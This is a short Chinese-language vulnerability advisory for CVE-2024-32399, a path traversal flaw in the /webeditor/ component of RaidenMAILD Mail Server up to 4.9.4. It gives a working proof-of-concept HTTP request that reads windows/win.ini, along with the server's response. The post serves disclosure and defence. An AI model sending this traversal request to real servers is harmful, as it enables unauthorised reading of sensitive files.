CVE-2024-32399|RaidenMAILD Mail Server路径遍历漏洞(POC)

2024-05-14 18:01:17 浏览数 (2)

0x00 前言

RaidenMAILD是一款强大的电子邮件服务器,该软件可以在相当短的时间内将它架设起来邮件服务器,操作简单,功能齐全,稳定运作。

适用于全 Windows 平台的电子邮件伺服器。

0x01 漏洞描述

RaidenMAILD Mail Server 4.9.4及之前版本中的目录遍历漏洞使远程攻击者能够通过/webeditor/组件获取敏感信息。

0x02 CVE编号

CVE-2024-32399

0x03 影响版本

RaidenMAILD Mail Server <= 4.9.4

0x04 漏洞详情

POC:

https://github.com/NN0b0dy/CVE-2024-32399/blob/main/README.md

代码语言:javascript复制
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close
代码语言:javascript复制
HTTP/1.1 200 OK
Connection: close
Content-Disposition: attachment; filename="../../../windows/win.ini";
Content-Type: application/octet-stream
Content-Length: 403
Date: Mon, 22 Apr 2024 15:00:41 GMT
Strict-Transport-Security: max-age=31536000; includeSubDomains
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Permissions-Policy: geolocation=(self "https://example.com"), microphone=()
Referrer-Policy: no-referrer
Content-Security-Policy: base-uri 'self'
Set-Cookie: IDHTTPSESSIONID=9E5BgVAlG7P7C5X; Path=/


; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
...
...

0x05 参考链接

http://www.raidenmaild.com/cn/

https://github.com/NN0b0dy/CVE-2024-32399/blob/main/README.md

0 人点赞